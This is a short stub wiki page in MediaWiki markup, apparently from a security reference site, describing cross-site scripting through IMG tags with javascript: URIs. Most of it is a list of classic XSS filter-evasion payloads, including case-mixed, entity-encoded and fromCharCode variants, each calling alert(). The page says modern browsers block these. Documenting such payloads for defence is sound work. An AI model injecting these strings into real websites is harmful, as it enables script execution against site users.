==Description==
It is possible for an attacker to execute Javascript code via the IMG tags.  This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.

==Examples ==
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.<br><br>

<IMG SRC="javascript:alert('Vulnerable');"><br>
<IMG SRC=javascript:alert('XSS')><br>
<IMG SRC=JaVaScRiPt:alert('XSS')><br>
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br>
<IMG SRC=`javascript:alert("RSnake says, <br>
'XSS'")`><br >
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br>
<IMG <br>
SRC=javascript:alert(String.fromCharCode(88,83,83))><br>
<IMG <br> SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br>

==Related Threats==

==Related Attacks==

[[XSS Attacks]]

==Related Vulnerabilities==

==Related Countermeasures==

==Categories==

{{Template:Stub}}

[[Category:Injection Attack]]